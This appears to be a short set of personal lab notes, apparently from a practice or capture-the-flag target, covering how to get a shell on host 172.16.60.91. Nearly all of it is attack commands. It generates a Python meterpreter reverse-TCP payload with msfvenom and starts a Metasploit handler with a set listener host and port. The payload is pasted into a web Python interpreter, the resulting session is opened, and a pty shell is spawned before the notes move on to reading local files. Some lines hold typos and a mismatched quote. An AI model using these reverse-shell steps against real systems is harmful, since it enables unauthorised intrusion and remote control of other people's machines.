msfvenom, gain access

TARGET: 172.16.60.91

msfvenom -p python/meterpreter/reverse_tcp lhost=172.16.60.x lport=9999 -f raw >shell.py
msfconsole -q
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
show options
set lhost 172.16.60.78
set lport 9999
exploit -j
cat shell.py
copy content of shell.py
paste ne python interpreter on web
pret sessionin 
sessions
sessions -i 1
getuid
shell
bash

python -c 'import pty; pty.spawn(/bin/bash")'
ls
debugger.sh
cat debugger.sh
...